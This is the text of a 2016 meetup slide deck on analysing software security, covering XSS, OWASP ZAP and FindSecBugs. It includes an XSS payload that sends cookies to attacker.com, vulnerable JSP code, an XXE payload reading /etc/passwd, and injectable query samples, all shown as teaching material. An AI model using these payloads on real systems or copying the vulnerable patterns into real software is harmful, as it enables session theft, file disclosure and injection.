This document summarizes a presentation about analyzing security in software products. It discusses how insecure coding practices can lead to vulnerabilities like cross-site scripting (XSS) and discusses using tools like OWASP ZAP and FindSecBugs to identify vulnerabilities through dynamic analysis of web applications and static analysis of source code. The presentation also asks what activities are legally permitted for security researchers.

1. Not Just POP-UPs :)
Analyzing Security in Software Products
By Prakhash Sivakumar
https://medium.com/@PrakhashS
https://www.linkedin.com/in/prakhashsiva
WSO2 Meetup- Thursday, September 22, 2016
http://www.meetup.com/wso2srilanka/events/233915649/

2. Haven’t you seen this ?

3. XSS DEMO

4. What if we modify the script like this ?
</div><script>
var oReq = new XMLHttpRequest();
oReq.open("GET",
"//attacker.com/log.php?data"+encodeURI(document.cookie),true);
oReq.send();
</script>

5. Insecure coding :(
<form action="xss4.jsp" method="get">
<input type="text" name="keyword" value=<% if (keyword !=
null){ out.print(keyword);} %>>
<br/><br/><input type="submit" name="Search"
value="Search"/>
</form>
<br/>
<%
if (keyword != null)
{
%>
Search Results for <%=keyword%>
<%
}
%>

6. What else can an insecure code would do
?

7. Dynamic code analysis and OWASP ZAP
[1] https://www.owasp.org/index.php/Top10#OWASP_Top_10_for_2013
[2] https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

8. Identifying vulnerabilities using OWASP ZAP
DEMO
Dynamic Scanning with OWASP ZAP for Identifying Security Threats : Complete Guide
https://medium.com/@PrakhashS/dynamic-scanning-with-owasp-zap-for-identifying-security-threats-complete-guide-52b3643eee04#.9zu0v
cpy0

9. Static code analysis - Find Sec Bugs
String generateSecretToken() {
Random r = new Random();
return Long.toHexString(r.nextLong());
}
--------------------------------------------------------------------
-
def executeCommand(value:String) = Action {
val result = "".!
Ok("Result:n"+result)
}
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<foo>&xxe;</foo>
--------------------------------------------------------------------
-
Session session = sessionFactory.openSession();
Query q = session.createQuery("select t from
UserEntity t where id = " + input);
q.execute();
http://find-sec-bugs.github.io/bugs.htm

10. Identifying vulnerabilities in code using
FindSecBugs
Demo
Static Code Analysis for Java using FindBugs Plugin and Identifying Security Bugs with FindSecurityBugs Plugin
http://tharindue.blogspot.com/2016/06/static-code-analysis-for-java-using.html

11. What is Legal ?
What you can do ?

12. ThAnK yOu :)